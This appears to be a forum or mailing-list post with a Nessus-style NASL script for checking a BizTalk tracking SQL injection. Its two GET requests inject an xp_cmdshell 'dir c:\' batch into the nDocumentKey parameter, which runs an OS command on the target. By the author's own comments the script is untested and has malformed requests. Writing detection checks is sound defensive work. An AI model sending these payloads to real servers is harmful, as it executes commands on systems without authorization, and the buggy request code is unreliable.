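And...this is alledgedly what will work for the biztalk sql injection....again, no server to test against... John W. Lampe https://f00dikator.aceryder.com/

# Check for the BizTalk tracking SQL injection (rawdocdata.asp and
# RawCustomSearchField.asp, nDocumentKey parameter).  Each probe injects a
# batch that asks SQL Server to run xp_cmdshell 'dir c:\' and reports a hole
# only when the response carries the "Directory" text a listing would contain.
# Caveats: this is an active check that executes a command on the target;
# the request framing is untested, as the note above says (the URIs contain
# literal spaces, and the two string() halves of each request are joined with
# no separator); and any page that merely echoes the word "Directory" would
# produce a false positive.

port = 80;

req1 = string("GET /biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec");
req1 = req1 + string("master.dbo.xp_cmdshell 'dir c:\\'-- HTTP/1.0", "\r\n\r\n");

req2 = string("GET /server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection =1;exec");
req2 = req2 + string("master.dbo.xp_cmdshell 'dir c:\\'-- HTTP/1.0", "\r\n\r\n");

# Send one request on a fresh socket and flag the port when the response
# looks like a directory listing.  Returns 1 when a hole was reported and
# 0 otherwise (including when the port cannot be opened).
function probe(req)
{
  local_var soc, r;

  soc = open_sock_tcp(port);
  if (!soc) return 0;

  send(socket:soc, data:req);
  r = recv(socket:soc, length:1024);
  close(soc);

  # Pattern is "Directory" rather than ".*Directory*": in the original the
  # trailing "*" applied to the "y" only, so "Director" matched as well.
  if (!isnull(r) && egrep(pattern:"Directory", string:r))
  {
    security_hole(port:port);
    return 1;
  }
  return 0;
}

# The original second probe re-sent req1 (copy/paste slip); it is meant to
# exercise the RawCustomSearchField.asp page with req2.
probe(req:req1);
probe(req:req2);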